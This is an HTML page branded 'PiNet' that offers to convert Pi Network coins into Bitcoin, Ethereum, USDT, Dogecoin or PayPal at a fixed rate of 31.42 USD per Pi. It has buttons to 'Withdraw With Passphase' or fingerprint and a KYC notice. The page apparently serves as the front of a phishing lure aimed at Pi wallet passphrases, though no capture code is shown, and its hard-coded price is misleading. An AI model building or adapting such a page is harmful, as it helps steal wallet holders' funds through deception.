<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Convert - PiNet</title>
    <link rel="icon" href="netpi-removebg-preview.png">
    
    <style>
        /* Global Styles */
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }
        
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            padding: 0px;
        }
        header{
            background-color: #76348e;
            height: 50px;
            padding: 8px;

        }
        
        /* Logo Styles */
        .logo {
            text-align: center;
            display: flex;
            max-width: 110px;
            margin: 0px auto;
            
            
        }
        
        .logo img {
            width: 150px;
            height: 35px;
            margin-left: -20px;
        }

        /* Login Container Styles */
        .login-container , .input-group-note {
            max-width: 400px;
            margin: 20px auto;
            padding: 20px;
            background-color: #fff;
            border: 1px solid #ddd;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    
        }
        .input-group-note{
            background-color:  #f0f0f0;
            box-shadow: none;
            border: none;
        }
        /* Form Styles */
        .login-form {
            display: flex;
            flex-direction: column;
        }
        
        .login-form img {
            width: 100%;
            height: 100px;
            object-fit: contain;
            margin-bottom: 20px;
        }
        
        /* Input Group Styles */
        .input-group {
            margin-bottom: 20px;
            
        }
        form label{
            padding: 2px;
            
        }
        .input-group label {
            display: block;
            margin-bottom: 10px;
        }
        
        .input-group input {
            width: 100%;
            height: 40px;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        
        /* Button Styles */
        .login-button {
            width: 100%;
            height: 40px;
            background-color: #76348e;
            color: #fff;
            padding: 10px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .two_buttons{
            width: 300px;
            margin: 15px auto;
            padding: 10px;
            
            
        }
        .login-button-white {
            width: 100%;
            height: 40px;
            background-color: #fff;
            color: #8a348e;
            padding: 10px;
            border: 1px solid;
            border-radius: 5px;
            cursor: pointer;
            margin: 10px auto;
            display: block; 
        }
        .drop-down{
           display: flex;
        }

        /* Responsive Design */
        @media only screen and (max-width: 768px) {
            .login-container {
                max-width: 90%;
            }
            .two_buttons{
                max-width: 90%;
            }
        }
        
        @media only screen and (max-width: 480px) {
            .login-container {
                max-width: 80%;
            }
            .two_buttons{
                max-width: 80%;
            }
            .input-group input {
                height: 30px;
            }
        }
    </style>
</head>

<body>
    <header>
        <div class="logo">
            <img src="wallet (1).png" alt="" style="width: 40px;"> &nbsp;
            <h4 style="color: white; font-family: Arial, Helvetica, sans-serif; margin-top: 9px;" >Convert</h4>
             &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <img src="netpi-removebg-preview.png" alt="" style="width: 40px;" height="50px">
        </div>
    </header>
    <!-- <div class="logo">
        <img src="Pi-Network.png" alt="photo not found">
    </div> -->
    <div class="login-container">
        <form class="login-form">
            <img src="PI-logos-removebg-preview.png" alt="Photo not found">
            <div class="input-group">
                <label for="username">Recipient Address</label>
                <div class="drop-down">
                    <select id="crypto-assets" name="options">
                        <option value="btc">BTC</option>
                        <option value="eth">ETH</option>
                        <option value="paypal">PAYPAL</option>
                        <option value="DOGE">DOGE</option>
                        <option value="tether">USDT</option>
                    </select>
                    <input type="text" id="address-input" name="options" style="border-radius: 0px 10px 10px 0px;" placeholder="Enter BTC Address" required>
                </div>
            </div>
            <div class="input-group">
                <label for="password">Amount (Pi)</label>
                <input type="number" id="meter" name="password" placeholder="Enter Quantity of Pi" oninput="convertMeterToFeet()" required>
            </div>
            <div class="input-group">
                <label for="password">Total Payment (USD)</label>
                <input type="text" id="feet" name="password" placeholder="Total Payment" readonly>
            </div>
           
        </form>
    </div>
    <div class="two_buttons">
        <button class="login-button-white" href="">>Withdraw With Passphase</button>

        <button class="login-button">Withdraw With Fingerprint</button>
    </div>
    <div class="input-group-note">
        <p>Note: KYC(1-9) must be completed to be Eligible!</p>
    
    </div>
    
    <script>

    // function to switch crypto with placeholder

    const cryptoAssetsSelect = document.getElementById('crypto-assets');
    const addressInput = document.getElementById('address-input');


    cryptoAssetsSelect.addEventListener('change',(e)=>{
      const selectedAsset = e.target.value;
      let placeholder;

      switch (selectedAsset){
        case 'btc':
            placeholder = 'Enter BTC Address';
            break;
        case 'eth':
            placeholder = 'Enter ETH Address';
            break;
        case 'tether':
            placeholder = 'Enter USDT(TRC 20) address';
            break;
        case 'DOGE':
            placeholder = 'Enter DOGE Address';
            break;
        case 'paypal':
            placeholder = 'Enter your Paypal @tag';
            break;
        default:
            placeholder = 'Enter BTC Address'
      }
      addressInput.placeholder = placeholder;
    })

// funtion to covert 

function convertMeterToFeet() {
	const meterValue = document.getElementById('meter').value;
	const feetValue = meterValue * 31.42;
	document.getElementById('feet').value = `${feetValue.toFixed(2)} $`;
    document.getElementById('meter').inputMode = `${meterValue.toFixed(2)} pi`;
  }



</script>
</body>
</html>
